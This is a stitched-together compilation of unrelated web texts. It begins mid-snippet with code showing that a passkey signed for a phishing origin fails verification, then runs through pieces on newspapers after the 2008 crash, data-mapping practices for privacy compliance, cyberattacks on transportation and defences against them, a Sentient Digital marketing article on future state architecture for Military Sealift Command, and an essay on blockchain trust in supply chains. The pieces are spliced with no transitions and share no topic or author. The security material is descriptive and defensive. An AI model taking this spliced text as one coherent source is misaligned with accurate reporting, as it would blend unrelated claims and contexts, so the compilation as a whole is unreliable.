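phished = sign_assertion(credential_key, challenge, "https://agency-login.example")
bad = verify(credential_key, challenge, "https://agency.example", phished)
print(ok, bad)  # True False
```

Because the origin is baked into the signed material, there is nothing a phishing page can relay that the real server will accept.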
Part 1 of this series sketches the history of journalism in the U.S. from the pre-Revolutionary era to the present day.
The economy came crashing down in September 2008 as the credit markets seized up, a massive dislocation which is now, tsunami-like, causing huge damage to the economy. This has significantly reduced the amount of credit available for businesses, and has put publishers, consortia and advertisers — many highly leveraged — into a situation that forces them to liquidate parts of their businesses and lay off large numbers of workers just to make the ballooning payments on their bonds.
Many news organizations — made vulnerable by media competition, the rapid drying-up of advertising dollars, fragmenting markets and the Internet — are being forced to close their doors, and it is very likely that many cities’ alternate papers, and in some cases their primary papers, will cease production this year.
The advertising market has collapsed. Automobile manufacturers are now either in or near bankruptcy. Financial services are, of course, in disarray. Real estate is facing its worst markets since the mid-1930s, and luxury goods advertising is disappearing as conspicuous displays of wealth make people targets.
With 5 million jobs lost in the last year and countless others facing reduction in hours or pay, consumer spending has given way to consumer saving. Advertising hasn’t completely disappeared, but its place as the engine driving journalism most certainly has been significantly diminished. In many places, advertising itself is being rethought as the Web continues to become more pervasive in our lives.
The Web’s Devastating Effect
During the 1930s, a number of newspapers that had survived for decades finally succumbed to the ravages of the Great Depression, but once the economy started to recover in the late 1930s and early 1940s — and especially as World War II created an insatiable demand for news — the newspapers in general came back, and many new ones were started, incorporating new technologies in order to be far more competitive.
Eventually, the current crisis will end as well, but it’s likely this time around that newspapers will not recover with the rest of the economy. A big part of the reason for this is the Web — more specifically, the rise of search engines, social media and semantics, known as the “Triple S Threat.” Taken together, these technologies give a significant competitive edge to the newest generation of publishers: everybody.
During the 1990s, as the World Wide Web first began taking shape, designers were torn about which medium the Web was most like. Was it more like a magazine, a newspaper, radio or television? In fact, it was like all of them … and none of them. The Web could mimic the characteristics of other media, from the telegraph and telephone to 3-D worlds. Moreover, it could make it possible to combine these media in ways that no one could have imagined when the first Web browsers appeared. This fluidity of media became the first, most obvious, threat to existing media organizations.
However, the Web proved to be devastating in more subtle and insidious ways. Most Web pages can be thought of as content liberally sprinkled with hyperlinks to other content. These hyperlinks create alternative pathways to content that often bypasses branding (and the corresponding gates), and what’s more, they make the content searchable.
Search engines like Google and Yahoo have changed the dynamics of the Web completely. Instead of locating content on the basis of a brand — in this case, embodied in the server address — they make it possible to find content by using keywords, in ways that frequently render useless the carefully designed front-page portals that companies often spend millions to develop.
Further, search results generally are sorted by relevancy, and freshness plays a big part. Because they search across news sites, the search engines themselves are very quickly fulfilling the timeliness aspect of contemporary journalism.
Everyone’s an Advertiser
This aspect of the collision of journalism and search engines flared recently when the Associated Press threatened to sue aggregators of its news content. Google has a formal aggregation agreement with AP, but Google CEO Eric Schmidt nevertheless warned it — and related organizations — that they risked angering users of news aggregation services at their peril.
The Google chief executive called on the newspaper bosses to engage with readers more thoroughly.
“These are consumer businesses, and if you piss off enough of them you will not have them anymore,” he said. He also condemned many of the newspaper publishers’ Web sites for the poor quality of their technology. “I think the sites are slow, they are slower than reading the paper. That can be worked on, on a technological basis.”
In this context, it’s also worth noting that Google has very quickly usurped the role of the advertising broker from Madison Avenue. Indeed, in many ways it is better to think of companies such as Google or Yahoo less as search engines and more as advertisers.
Because they control such a critical part of the Web browsing pipeline, they are able to pull together semantic information about users based upon internal profiles, and thus are much better able to target these users at a level that most ad agencies a couple of decades ago would have found impossible to achieve. Not surprisingly, those seeking to advertise are attracted to this — even more so given the comparatively low cost of such advertisements.
Yet there’s another thing tearing away at the advertising firmament. Programs such as AdSense make Web site owners into ad space sellers, even if the Web site in question is a single-person shop operating a blog.
This approach takes advantage of the distributed nature of the Web to make the “long tail” profitable, and it serves to further weaken one of the key benefits that traditional media have had: the ability to sell advertising space in a broadcast fashion.
Kurt Cagle is the managing editor for XMLToday.org. Follow Kurt Cagle on Twitter.
Data Mapping | Best Practices to Follow in Data Mapping
What is Data Mapping?
Modern enterprises collect a huge volume of data from a variety of sources and use it through complex interactions across the organization. Organizations can’t analyze, transform, share, or derive valuable insights from that data unless they have a common understanding of it. Data mapping is the process of establishing relationships between separate data models to create that common understanding.
Why Data Mapping?
In this data-driven business environment, companies are collecting data from customers’ mobile devices, websites, and vendors. The collected data is valuable only when the right systems are in place to handle its volume and complexity. Data mapping is used to integrate this complex data. A good data map is a necessary component of data management, data governance, data migration, and data integration. Increasingly, data mapping has become the starting point for DataGovOps-related work.
Data Mapping In the Context of Privacy
With new privacy laws (GDPR, CCPA) and increased customer demand for privacy, companies are required to understand what data they hold and how the data flow inside the organization. By mapping the data, they can comply with privacy laws and implement better privacy controls and protection. Data mapping has become a foundational work, using which organizations can understand what data they collect, process, share, and store.
For instance, GDPR (article 30 and 36) requires organizations to document their processing and conduct periodic data protection impact assessments (DPIA). Without a comprehensive data map, organizations can’t comply with these requirements.
Top 8 Best Practices to Follow in Data Mapping to Achieve Privacy Compliance
1) The Right Approach for Mapping the Data
Data mapping often involves people from across the organization. Your approach largely depends on the cost and resources available to the project. Mapping can be implemented across the whole organization simultaneously, or one team or one microservice at a time. Companies must involve these groups in a high-level overview of their activities in order to proceed with a comprehensive plan.
2) Identify and Involve Data Stewards/Owners
Mapping can carry varying degrees of risk, and identifying data owners reduces the complexity; hence you must identify the data owners and stewards who represent different parts of the organization. These employees are responsible for the data within their areas and bring a wealth of knowledge about the data’s history and context.
3) Pick the Right Tool/Solution
Data mapping is a complex process, and the tool used has a significant impact on the outcome; hence companies should be careful in selecting the right tool for the job, depending on their existing infrastructure, volume of data, and goals. With many solutions available on the market, from on-premise tools to open-source and cloud-based mapping tools, companies should choose a system that supports their data strategy. Before selecting a data mapping tool, consider the following factors:
- Diverse Set of Source Systems – A data mapping tool must handle a variety of data sources. Some tools can handle different data types and sizes without compromising accuracy, while other solutions focus on very high accuracy for a specific type of data or data source. Companies must make sure the selected solution supports the diverse sources in their organization. Plan for the future: identify a tool that handles a variety of data sources and supports new ones.
- Automation and Scheduling – Automating parts of the data mapping process will save time when you update the map periodically; hence, look for solutions that offer options to automate without writing or changing code. The automation process should be simple, such as a drag-and-drop method, to avoid complexity. Tools that offer process orchestration and scheduling features to automate mapping reduce manual effort and time.
- Track Changes – Good data mapping tools allow users to track the impact of changes as maps are updated. They should also keep a trail of when and how changes were made to a particular data set; this record is beneficial for auditing and compliance purposes.
- Delta Changes – Data mapping tools should allow users to reuse maps, so you don’t have to start from scratch each time. This feature saves time and resources for the organization.
- Personal Data Identification – To growing privacy concerns and regulations, many advanced data mapping software applications allow users to identify and map personal data flow within an organization.
- User Interface – The user interface is an essential factor for the data mapping tool. It should be simple to use for all the employees involved in the process. If you have many data stewards from business with less technical background, you have to pick a tool that caters to the audience.
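The “Track Changes” capability above can be sketched as a minimal append-only change log, so every edit to a field mapping can be replayed or reviewed later. All names here are illustrative:

```python
# Minimal audit-trail sketch: each mapping change is appended to a trail
# with a UTC timestamp, the author, and the old/new values.
from datetime import datetime, timezone

class MappingAudit:
    def __init__(self):
        self.current = {}   # source field -> target field
        self.trail = []     # append-only history of changes

    def set_mapping(self, source: str, target: str, author: str) -> None:
        self.trail.append({
            "when": datetime.now(timezone.utc).isoformat(),
            "who": author,
            "field": source,
            "old": self.current.get(source),
            "new": target,
        })
        self.current[source] = target

audit = MappingAudit()
audit.set_mapping("Customer #", "customer_id", "alice")
audit.set_mapping("Customer #", "cust_id", "bob")
print(audit.current["Customer #"])   # cust_id
print(len(audit.trail))              # 2
print(audit.trail[1]["old"])         # customer_id
```

Because the trail is never rewritten, it doubles as the compliance record the bullet list describes.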
4) Ensure Data Security
Recently developed data mapping software solutions are equipped with various security features that let you secure your database while still providing controlled access to data for DPOs and analysts. They also allow organizations to conduct a risk analysis of their data.
5) Identify and Map Personal Data
Growing privacy concerns and regulations such as GDPR and CCPA bring new responsibilities for companies in handling personal data. Advanced data mapping software applications allow organizations to identify and map personal data. You could use one of these tools to identify personal data within your company. In addition to mapping personal data, you must ensure that the data is treated in compliance with privacy laws.
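As a rough illustration of rule-based personal-data discovery, the sketch below scans free text for email- and US-style phone-number patterns. Real tools combine many more detectors (names, national IDs, addresses) plus validation, so this is only a toy:

```python
# Toy personal-data scanner: regex detectors for email addresses and
# US-style phone numbers. Detector names and patterns are illustrative.
import re

DETECTORS = {
    "email": re.compile(r"[\w.+-]+@[\w-]+\.[\w.-]+"),
    "phone": re.compile(r"\b\d{3}[-.]\d{3}[-.]\d{4}\b"),
}

def find_personal_data(text: str) -> dict[str, list[str]]:
    hits = {}
    for label, pattern in DETECTORS.items():
        found = pattern.findall(text)
        if found:
            hits[label] = found
    return hits

sample = "Contact jane.doe@example.com or call 555-123-4567."
print(find_personal_data(sample))
```

Scanning each data store or export with detectors like these is one way a mapping tool can flag fields that need privacy controls.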
6) Automate the Process
Data inside an organization changes and evolves, so you have to update the map periodically; look for options to automate parts of the process. Automating parts of the data mapping process will save time in the long run.
7) Expect Inconsistencies and Naming Conflicts
Most companies receive data from business partners, such as resellers and suppliers. Mapping and integrating data from third parties can be challenging due to differences in data naming. One partner might name the Customer field as ‘Customer ID’ while another partner might name it as ‘Customer #.’ Your data mapping solution and the process should address the challenge of naming conflicts.
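The “Customer ID” versus “Customer #” conflict above can be resolved with a canonical-name map applied before integration, so every partner’s feed lands in one internal schema. The field names and partners below are illustrative:

```python
# Canonical-name map: normalize each partner's field names to one
# internal schema before records are integrated.
CANONICAL = {
    "customer id": "customer_id",
    "customer #": "customer_id",
    "order date": "order_date",
    "orderdate": "order_date",
}

def normalize_record(record: dict) -> dict:
    out = {}
    for field, value in record.items():
        key = CANONICAL.get(field.strip().lower())
        if key is None:
            # Surface unmapped fields instead of silently dropping them.
            raise KeyError(f"unmapped source field: {field!r}")
        out[key] = value
    return out

partner_a = {"Customer ID": 42, "Order Date": "2022-09-01"}
partner_b = {"Customer #": 42, "OrderDate": "2022-09-01"}
print(normalize_record(partner_a) == normalize_record(partner_b))  # True
```

Raising on unmapped fields is a deliberate choice: it forces the naming conflict into the open the first time a partner changes its schema.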
8) Document the Process
Data maps are not a one-time deal. You may have to repeat the process periodically and involve new people to lead it; hence you must document the process, the steps, the findings, and the decisions. Moreover, documentation avoids mismatches across the organization. For example, documenting the set of principles used to classify data will help maintain a consistent approach across the company.
Why is Data Mapping Important Beyond Privacy?
Data mapping is an integral step in various data management processes, including:
Data mapping is the first step in a range of data integration tasks, including data transformation between the source and destination. A data mapping tool connects the distinct applications and governs how the complex data is handled between them.
Data Migration is the process of selecting, preparing, extracting, and transforming data and permanently transferring it from one IT storage system to another. Using an efficient data mapping solution that can automate the process is vital in migrating data to the destination successfully.
Data warehousing relies on mapping to create the connections between source and target tables. Using a well-defined data mapping model, we can define how data will be structured and stored in the data warehouse.
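A hypothetical sketch of such a data map for migration or warehousing: each target column names its source field and an optional in-flight transform. The schema and transforms are invented for illustration:

```python
# Declarative data map: target column -> (source field, transform).
# Applying the map moves one legacy row into the warehouse schema.
MAP = {
    "customer_id": ("CustID", int),
    "full_name":   ("Name", str.title),
    "country":     ("Country", str.upper),
}

def apply_map(source_row: dict) -> dict:
    return {target: transform(source_row[field])
            for target, (field, transform) in MAP.items()}

legacy_row = {"CustID": "1007", "Name": "ada lovelace", "Country": "uk"}
print(apply_map(legacy_row))
# {'customer_id': 1007, 'full_name': 'Ada Lovelace', 'country': 'UK'}
```

Keeping the map declarative (data, not code) is what lets mapping tools offer the automation, reuse, and change tracking discussed above.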
As the transportation sector grows increasingly connected to the internet, it becomes more susceptible to cyberattacks. Failing to protect the industry might induce significant damage to companies and disrupt our lives.
Threat actors continually develop new means to attack critical infrastructure – from healthcare facilities to power utilities – to make a financial gain, exfiltrate information, or cause chaos.
The transportation sector, like water, power, and telecommunications, is critical to people's daily lives. People need to move from one place to another; they also need to buy goods and get their cars filled with fuel. The transportation sector provides all these services and more, and failing to protect it from cyberattacks will profoundly impact all other business sectors.
Attackers driven by the thirst for money and chaos
The motivations for cyberattacks against the transportation sector can vary. We can recognize the following causes:
Financial gain. The NotPetya ransomware attack against the giant logistics company Maersk caused more than $300 million in losses due to business interruption in 2017.
Information theft. Threat actors exfiltrate information about customers and business partners, for example. Ransomware operators now threaten companies with publishing their compromised data on data leak websites if they refuse to pay the ransom. This recently happened to the giant German global logistics firm Hellmann, which fell victim to a ransomware attack last December.
Disruption. Malicious actors target organizations to cause chaos and wide disruption in the target country/state. The motivation here could be a direct attack from a foreign country to advance their agenda or caused by terror organizations that aim to cause extensive damage and harm to a large number of citizens for ideological and political gains.
The work of transportation and logistics companies spans the aviation, maritime, and trucking sectors. Their dependence on digital technologies to facilitate their work has expanded their attack surfaces and made them more vulnerable to cyber threats.
Aviation industry hit hard
Cyberattacks against airline companies can take different forms and aren’t limited to the airplane operator. Various vendors are involved in providing airplane services, and all are susceptible to cyberattacks, such as airlines, airports, technology vendors, and other contractors and subcontractors responsible for providing ground services.
The primary motivation behind attacking airline companies is stealing travelers' personal and financial information. The stolen data can be used to commit fraud or sold to interested parties on darknet marketplaces. The aviation industry is prosperous and very time-sensitive, and it needs a series of interconnected services to function properly. This fact has made attackers more willing to target this sector, especially with ransomware, because of the high impact of any service interruption. The affected company is likely to pay the ransom quickly to restore normal operations and avoid considerable interruption losses.
The cyberattack against the low-cost British airline EasyJet is a prominent example of the severe consequences cyberattacks can have for airline companies. In 2020, the company was hit by a cyberattack that compromised the personal and financial information of 9 million of its customers. The affected travelers filed more than 10,000 lawsuits from 50 countries worldwide, and the attack caused the company to lose 45% of its share value.
Attacks again maritime disrupt supply chains
The maritime sector includes vessels, shipbuilders, ports, ground services, technology providers, and all other vendors in the supply chain. All these parties utilize digital technologies to facilitate their work and interact with each other. Attacking maritime transportation will heavily impact the global supply chain of goods.
Maritime transportation is not only critical for moving goods; for instance, most of the world's petroleum and other liquid energy supplies are carried through the sea. Disrupting moving power supplies through maritime trade will have disastrous consequences on the global economy because it will impact all other sectors.
The increased adoption of digital technologies across all industries has encouraged shipping companies to ride the wave and see how they can benefit from automation.
Shipping companies are now using different hardware and software technologies to enhance work efficiencies in data analysis, the Internet of Things (IoT), and operational technology (OT) areas.
Cyberattacks against the maritime industry are similar to those targeting critical infrastructure. The most used attack vectors remain social engineering and ransomware. Some attacks aim to cause disruption, such as DDoS attacks against Global Positioning System (GPS) and Automatic Identification System (AIS). In contrast, others target shipping digital communications, route management solutions, and Integrated Control Systems (ICS) used to monitor the complex components that make up every vessel.
Sharp increase in attacks against ground transportation
The trucking sector uses digital technologies to enhance efficiency, beginning with autonomous vehicles, tracking solutions, cloud technologies for administrative works and running apps (SaaS and IaaS), IoT sensors in trucks, and ending with route management.
Ground transportation companies generally do not take cybersecurity threats seriously because they think they are not lucrative targets for threat actors; however, this is inaccurate. According to Attrix president Anthony Mainville, ransomware attacks increased by 80% in 2020, and the annual growth of such attacks in transportation reached 186% in June 2021.
The recent attack against the Minnesota trucking and logistics company Bay & Bay, which happened for the second time (the first ransomware attack occurred in 2018), shows that even prepared companies who suffered from a significant cyber incident in the past still fall victim again to the same threat type, despite the enhanced security tools, systems, and processes.
Common attack vectors
Like other high-profit sectors, transportation and logistics companies face many cyber threats. The following are the most common.
Phishing emails. Intruders impersonate a legitimate entity (e.g., a bank or a legitimate third-party provider) and communicate via email, SMS, phone calls, or even in person. They use different psychological tactics to convince targeted individuals to hand over sensitive information, such as login credentials. There are different types of phishing, such as spear-phishing (a targeted attack) and spear-phishing attachments (which attach malware to email messages to gain an entry point into the target IT environment through the compromised endpoint device).
Ransomware. This is the greatest threat targeting all organization types worldwide. Ransomware works by encrypting target company IT systems files and demanding a ransom to remove the restriction. The profitable model of ransomware has encouraged organized-criminal groups to utilize this attack vector heavily to target transportation companies.
Exploiting the remote-working model. Since the COVID-19 pandemic, companies have shifted many job roles to fully remote. Employees' home devices are less secure than those in the office environment and are easier for threat actors to infiltrate.
Responding to cyberattacks
Today's IT environments are complex, spanning on-premises and cloud infrastructure. To detect advanced cyber threats and unknown malware, installing a Network Detection and Response (NDR) solution is critical for monitoring all digital interactions in the organization's digital ecosystem.
Secure endpoint and IoT devices. Installing antivirus software and personal firewalls on all endpoint devices (workstations, laptops, tablets, and smartphones) is critical. Most IoT devices cannot be protected in the traditional way, so your company needs a strict approach to assessing the security of every IoT device used in its environment and selecting the best tools and security controls to protect each one.
Network segmentation. Dividing a network physically through switches and routers, or virtually through VLANs, is a good security practice that prevents cyber threats from spreading to all network segments at once. It also allows the security team to apply specific security controls to each segment, according to its importance and the type of data and apps it holds.
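The segmentation idea boils down to an allow-list of which segments may talk to which. A hedged Python sketch of that policy logic (the segment names and the policy table are invented for illustration; in practice this is enforced by firewalls and switch ACLs, not application code):

```python
# Hypothetical policy: which (source, destination) segment pairs may exchange traffic.
ALLOWED_FLOWS = {
    ("office", "dmz"),      # workstations may reach public-facing services
    ("dmz", "office"),
    ("office", "servers"),  # note: the IoT segment gets no path to the servers
}

def is_flow_allowed(src_segment: str, dst_segment: str) -> bool:
    """Return True when the segmentation policy permits this traffic."""
    if src_segment == dst_segment:
        return True  # intra-segment traffic is not filtered at this layer
    return (src_segment, dst_segment) in ALLOWED_FLOWS

print(is_flow_allowed("office", "servers"))  # True
print(is_flow_allowed("iot", "servers"))     # False: a compromised sensor stays contained
```

The payoff is visible in the last line: a threat that lands on an IoT device has no permitted route into the server segment.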
Patch management. Any device that accesses your enterprise IT environment should be appropriately patched. This includes keeping operating systems and all installed apps up to date, and it prevents threat actors from exploiting security vulnerabilities to gain a foothold in the target environment.
Backup regularly. Ensure you have a complete backup of all work data. This allows you to restore operations quickly in the case of a ransomware attack.
Cybersecurity awareness training. This is the most important protective measure against all cyber threats. Regardless of the security solutions installed, a single error by an unaware employee can result in ransomware being installed in your environment, rendering all other protective measures useless.
Future state architecture refers to the development of a proactive technology roadmap designed to future-proof an organization's IT infrastructure against the unforeseeable demands that shifting commercial conditions and technological developments will place on enterprise architecture. It sets enterprise architecture accomplishments against a timeline that shows how enterprise architecture will be developed to push the organization toward IT transformation.
While evolution is a constant within the world of network IT and communications software, the exact nature of this change is unknowable. In order for it to be successful and serve the business, nonprofit, or government agency at hand, enterprise architecture must align with the organization’s contemporary and future requirements.
Rather than investing in technology for its own sake, future state architecture is about serving the business with a robustness and flexibility which will allow for long-term dynamism. Built into this model is the idea that future capabilities and requirements cannot be fully known, so the architecture must be flexible enough that applications and functionalities can be incorporated in the future.
As digital transformation initiatives pick up speed and next-gen technologies like artificial intelligence, 5G, and Internet of Things take hold, the future is becoming increasingly unpredictable. It has never been harder for enterprises to anticipate what will be required from their networks in the next few years, which is what makes effective future state architecture so critical today.
Defining Future State Architecture
When the decision is made to implement a new IT system, enterprise architects must avoid replicating the previous system. Often, this system has been patched together into a chaotic “hairball” of dated applications using painstakingly bespoke engineering solutions.
Although they cannot predict the future with 100% accuracy, enterprise architects can be confident that certain requirements will be placed on the system. The architect’s job is to create a system that can adapt to these requirements.
As well as robustness, a degree of flexibility has to be built into the new enterprise architecture. Not only must it be capable of meeting demands outside the current paradigm of information technology expectations, it must also allow for innovation in the future.
If future users and engineers are unable to add future functionalities, the new enterprise architecture will quickly become beset with the same problems as the legacy system. This is a costly and inefficient cycle.
Future state architecture refers to the practice of pragmatically building open-ended and versatile functionalities, based on known business needs and future goals, into enterprise architecture. Future state architecture best practices help organizations avoid creating a system that can no longer serve its purpose in the future.
Cost, Security, Flexibility: Three Competing Requirements
Because enterprise architecture is often brought in to replace an outdated and even chaotic system of incompatible applications, a lot of enterprise architecture is developed on the basis of correcting the problems of the previous system.
Three distinct requirements begin to emerge and may appear to be incompatible:
- The architecture must be secure.
- The architecture must be flexible.
- The architecture must be affordable.
An architecture that places a high emphasis on security can struggle to be suitably flexible or to be developed at a low cost, for instance. Alternatively, a system that prioritizes flexibility may make it easier to adopt new functions and capabilities but struggle to keep pace with security needs. A focus on keeping the project within a restrictive budget may compromise both security and agility.
As a result, the various requirements expected from enterprise architecture must be balanced against one another, creating a strong, budget-appropriate, and agile system. For future state architecture, these competing requirements must be anticipated in the system’s functionalities for future growth as well.
Technological breakthroughs are pushing the business ecosystem to become increasingly sophisticated, and companies are required to change themselves to adapt to fresh challenges and realities. At the same time, the non-commercial applications of future state architecture are diverse.
Every business has many parts, which may include:
- Products and/or services
These elements have to work together seamlessly in order to create value, leading the customer to buy whatever the company is selling and the company to be profitable.
It is worth noting that the term “enterprise” is not intended to indicate only for-profit endeavors, but rather organizations in general, to include:
- Government agencies
- Military branches
In spite of their differences, there is a lot of overlap between what each type of entity requires from their enterprise architecture.
Case Study: Sentient Digital’s Military Sealift Command Contract
In 2019, Sentient Digital, then operating as Entrust Government Solutions, was awarded a $49 million contract to provide information technology engineering support to the Military Sealift Command (MSC).
The MSC is the division of the U.S. Navy that controls military ocean transport ships and whose duties include replenishment of Navy ships as well as transporting cargo and supplies, among other critical missions. Sentient Digital was tasked with helping MSC to modernize command, control, communications, and computers (“C4”) systems.
Sentient Digital will also support the development of governance measures to ensure the MSC’s IT platforms align with its N6 division’s strategic business support plan, architecture frameworks, and technical standards established by the Department of Defense and Department of the Navy.
The contract requires Sentient Digital to conduct analysis and create an IT investment roadmap for the development of MSC's future state architecture. As noted above, MSC is a critical support command providing auxiliary services to the U.S. Navy, including its warfighters.
Sentient Digital’s approach to future state architecture began with a comprehensive current state evaluation of MSC’s architecture, comprising:
- MSC current system capabilities review against joint capability areas
- MSC systems requirements review against N6 capabilities
- IT investment plans review
- Gap analysis of current and future capability sets
This is ultimately leading to identification of IT investment opportunities based upon gap analysis and the creation of a roadmap for future state enterprise architecture for the MSC’s N6 initiative.
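At its core, a capability gap analysis compares what a system can do today against what it must do tomorrow. A hypothetical Python illustration of that comparison (the capability names are invented; the real MSC analysis against joint capability areas is far more involved):

```python
def capability_gap(current: set, required: set) -> dict:
    """Compare current system capabilities against required future capabilities."""
    return {
        "missing": sorted(required - current),   # candidates for IT investment
        "covered": sorted(required & current),
        "surplus": sorted(current - required),   # candidates for retirement
    }

current = {"voice comms", "hr management", "navigation"}
required = {"voice comms", "navigation", "satellite ip services", "supply analytics"}
gap = capability_gap(current, required)
print(gap["missing"])  # ['satellite ip services', 'supply analytics']
```

The "missing" set is exactly what feeds an investment roadmap; the "surplus" set flags legacy functionality that may no longer justify its maintenance cost.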
Enterprise Architecture Objectives in the Military and Private Sectors
The most immediately significant difference between commercial IT infrastructure and its military counterpart is the primary objective of each.
While a military contract is an opportunity for streamlined cost efficiencies and economic benefits, ultimately the deliverable is enhanced security to the lives and wellbeing of the warfighters. When technology is supporting warfighters, the end user is often in a hostile and unfamiliar environment, with limited or zero pre-existing infrastructure. The warfighter may have:
- Surveillance equipment
- Local and long-range communications devices
- Scanning systems
If the warfighter is at sea, for example, their vessel is likely to require the following systems:
- Communications (military, commercial, IP services)
- HR management
- Navigation systems
- Engineering systems
- Complex weapons systems
- Sophisticated resource and supply chain analytics
- Medical devices
The enterprise architecture must deliver a system which allows these diverse applications to be compatible. Failure will lead to a patchwork of inefficient systems and a greater demand on time, expertise, and resources dedicated to creating application flows. Ultimately it is the warfighter who would suffer, left with less than optimal communications, surveillance, and weapons systems.
Enterprise Architecture on Land and at Sea: Military and Civilian Applications
There is a substantial overlap between military requirements from enterprise architecture and more quotidian private sector requirements. Civilian resource extraction professionals working in the field have similar systems and devices to military personnel, for example. They also often work in sub-zero or tropical conditions or in marine environments.
The requirements for strong enterprise architecture are broadly similar. From extracting core samples to assessing the damage in the aftermath of a disaster, an organization with time-sensitive, high-stakes field-based operations needs to be confident that the data they capture can be sent to a different element of the organization in a form that can be processed.
This is true of:
- The disaster response industry
- Search and rescue teams
- Oil and gas exploration/extraction
- Law enforcement and firefighting
- Elements of construction and engineering
Furthermore, while military applications are assumed to carry “life or death” stakes and the private sector is expected to be more concerned with business figures, resource extraction and disaster response are both industries with a serious and sustained threat to life.
Enterprise Architecture on Land and at Sea: Cultural Attitudes
Sentient Digital is a veteran-owned and operated company which provides technology solutions to federal, defense, and commercial clients using multiple delivery models. As a company with an agile mindset focused on meeting client objectives through cloud, cybersecurity, software development, and systems integration, Sentient Digital is experienced in government, military, and for-profit decision-making processes.
As technology advances, the challenges faced by contemporary business include:
- Competition from both disrupters and legacy companies
- International challenges
- Increased customer expectations
- Emergence of new business models
- Rapidly shifting regulatory landscape
Each of these threats represents an existential challenge to the contemporary business, which can only function so long as it successfully creates value for the customer. For Military Sealift Command specifically, and the military generally, a decline in operational power, organizational efficiency, and technological dominance could lead to a loss of military supremacy.
When it comes to future state architecture, the cultures within the contemporary business and within the military reflect an awareness of these critical threats.
Sentient Digital’s Work on the MSC Systems
Members of Sentient Digital’s team have undertaken the mapping of MSC’s current state enterprise architecture in comparison with the Department of Defense’s joint capabilities and functions lists. Looking at current state enterprise architecture enables us to undertake analysis geared towards assessing MSC’s ability to complete their missions in contested environments. Potential capability solutions can be either process changes or material changes.
Various N6 personnel have also been consulted in the architecture review sessions, providing the opportunity for input to and awareness of imminent developments to MSC architecture. Ultimately, the objective is the construction and implementation of an IT investment roadmap which will lead to the transformation required to meet future capabilities.
Supporting the warfighter in high-stakes situations is the reason for the project, as the main objective of MSC, and our use of future state architecture best practices will facilitate this goal. A robust and flexible future state enterprise architecture will allow the Department of Defense to remain equipped to deliver on its portfolio. With a comprehensive overhaul, MSC will be able to continue its work supporting warfighters regardless of future developments.
Get in Touch Today About Future State Enterprise Architecture
While many of the systems, processes, and technologies which Sentient Digital provides to MSC and other government agencies are proprietary and classified, parties interested in careers with SDi or becoming a client are encouraged to reach out to us to learn more.
Sentient Digital is proud to be veteran-owned and operated, and we look forward to helping more government and commercial clients with their enterprise architecture.
Finding the weakest link
Things get even more interesting when we delve into the “trust” bucket because, though tech does play a part, there are also philosophical, ethical, and human perspectives to consider. As information and knowledge managers, we naturally understand why people need access to well-governed, accurate, and timely data and knowledge (information). But surrounding the creation, management, and dissemination of that information are often invisible rules and processes that pivot around our concepts of trust. A throwaway but catchy phrase we have used for years runs along the lines of “the right information, at the right time, to the right person.” It’s a good phrase, but when we use the word “right,” we mean “correct.” We ask questions such as: Are there multiple versions? Is this the correct version? Is the information accurate? Has it been changed? To validate the answers to those questions, we rely on systems of trust and supervision.
Yet today, if you underpin your information management systems with a blockchain, everyone has the same version of the “truth,” so these questions become unnecessary. In effect, blockchains provide a trustless system; they remove the need to trust one another. That eliminates the need for multiple copies of a document and, notably, the need to regularly verify that this document (or data) is correct. It may also mean that some links can be removed altogether from our “chains.”
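The "single version of the truth" property rests on each record cryptographically committing to the one before it, so any tampering is detectable by everyone. A toy Python sketch of that mechanism (a teaching aid only, with hypothetical structure; a real blockchain adds consensus, networking, and digital signatures):

```python
import hashlib

def chain_append(chain: list, document: bytes) -> None:
    """Append a document; each entry's hash commits to the previous entry."""
    prev_hash = chain[-1]["hash"] if chain else "0" * 64
    entry_hash = hashlib.sha256(prev_hash.encode() + document).hexdigest()
    chain.append({"doc": document, "prev": prev_hash, "hash": entry_hash})

def chain_is_valid(chain: list) -> bool:
    """Anyone holding the chain can recompute it and agree on one version of the truth."""
    prev_hash = "0" * 64
    for entry in chain:
        expected = hashlib.sha256(prev_hash.encode() + entry["doc"]).hexdigest()
        if entry["prev"] != prev_hash or entry["hash"] != expected:
            return False
        prev_hash = entry["hash"]
    return True

ledger = []
chain_append(ledger, b"bill of lading v1")
chain_append(ledger, b"customs declaration")
print(chain_is_valid(ledger))                     # True
ledger[0]["doc"] = b"bill of lading (tampered)"
print(chain_is_valid(ledger))                     # False: any change breaks the chain
```

Because verification is mechanical, the questions "Is this the correct version?" and "Has it been changed?" no longer need a trusted human answer.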
Accuracy through automation
On parallel lines, all humans make mistakes, such as misfiling a piece of information, incorrectly inputting data, or missing essential elements in long-form documents. Technology is not perfect and can never be error-free, but document capture and understanding technologies, such as optical character recognition (OCR) and natural language processing (NLP), today typically produce much lower error rates than humans. If the tech has any doubts, it can flag that for a user to verify. In short, we can often trust the correctness and quality of information captured by technology more than information processed by a human.
This may seem a stretch, and all technology can be misused or poorly implemented and maintained. But assuming the technology has been used well, it is typically much more accurate and relatively error-free. Hence, we can trust the technology to manage the bulk of our information assets, and maybe only check or supervise a tiny percentage. Similarly, an automation tool undertakes manual, repetitive tasks the same way every time, whereas quirky real-world humans will stray at times.
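The flag-it-for-a-human behavior described above can be sketched as a simple confidence threshold over captured fields. A hypothetical Python illustration (field names, scores, and the 0.9 threshold are invented):

```python
def route_document(fields: dict, threshold: float = 0.9):
    """Split captured fields into auto-accepted and flagged-for-review buckets."""
    accepted, review = {}, {}
    for name, (value, confidence) in fields.items():
        (accepted if confidence >= threshold else review)[name] = value
    return accepted, review

captured = {
    "invoice_number": ("INV-1042", 0.99),
    "total": ("1,250.00", 0.97),
    "handwritten_note": ("rush order?", 0.41),  # low OCR confidence
}
accepted, review = route_document(captured)
print(sorted(review))  # ['handwritten_note']: only this field needs a human
```

This is the "check only a tiny percentage" pattern in miniature: the bulk of fields pass straight through, and human attention is spent only where the machine is unsure.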
The scale of opportunity
So, back to the supply chain world of warehouses, containers, ships, trucks, refrigeration units, and barcodes. The supply chain has run remarkably well since time immemorial, but it only takes one weak link to impact the entire chain; for example, a mismatched invoice, an incomplete export document, or a missing bill of lading. For generations, trust and relationships have kept the wheels turning. Though that will always be part and parcel of good business, it’s now possible to eliminate many trust-based links, dramatically reduce human error, and move the onus of trust away from individuals and onto the system. The technology available today works well; the challenge for the supply chain, and indeed for us all, is to grasp the scale of the opportunity we have and to take some leaps of faith, reimagining ideal operating scenarios, whether in shipping crabmeat across an ocean or managing complex knowledge networks.
